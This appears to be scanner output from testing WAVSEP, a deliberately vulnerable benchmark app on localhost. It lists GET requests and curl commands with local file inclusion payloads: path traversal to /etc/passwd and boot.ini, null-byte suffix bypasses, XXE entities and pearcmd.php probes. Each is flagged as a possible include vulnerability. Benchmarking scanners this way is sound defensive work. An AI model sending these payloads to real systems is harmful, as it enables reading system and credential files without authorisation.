GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
